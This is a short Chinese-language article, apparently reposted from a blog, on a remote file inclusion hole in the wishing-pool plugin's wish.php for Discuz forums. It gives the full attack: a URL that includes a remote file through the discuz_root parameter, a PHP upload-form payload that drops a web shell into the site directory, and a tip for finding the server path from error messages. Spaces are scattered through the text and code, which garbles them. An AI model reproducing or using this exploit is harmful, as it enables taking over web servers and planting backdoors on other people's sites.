来源:鬼仔blog
许愿池插件的wish.php文件出的问题:
requi re $ discu z_r oot.'./in clu de /disc uzc ode.f unc.php';
手工利用方法:
远程包含漏洞,变量discuz_root过滤不严,利用方法:
http://u rl/wish.ph p?discuz_r oot= ht tp://www.n eeao.com/xx xx.txt?
不一定 非要tx t后缀,可以改为任意 后缀,后面一定要记 得加问号。
这里x xxx. t用CN. Tin k的那个小马 写 个shell进 去: < ? c o p y ( $ _F I L ES[ M yF i le][t mp _na m e ], "C : \ I n e t p ub \vh o s ts \baid .c om\b b s\ guiz ai.p hp ");?>
<fo rm ENC TYP E = " m u l tip a rt/f o r m -d a t a" A C TI O N ="" ET H O D= "P OST">
<in put N AM E=" M yFil e" T YPE="file ">
<input V AL U E =" 提 交 " TYP E="su b mit"> < / f o r m>
网站 物理路径 可以通过提交h tt p://u rl /wish ph p?disc uz_ r oot= http :/ / w w w .h uaid an.or g/x x x x.txt ,看错误提示信息, 然后修改xxxx.tx t中的路径即可。 guizai.php就是你上传的shell的名字 。 |
安全中国首页 > 文章中心 > Discuz文章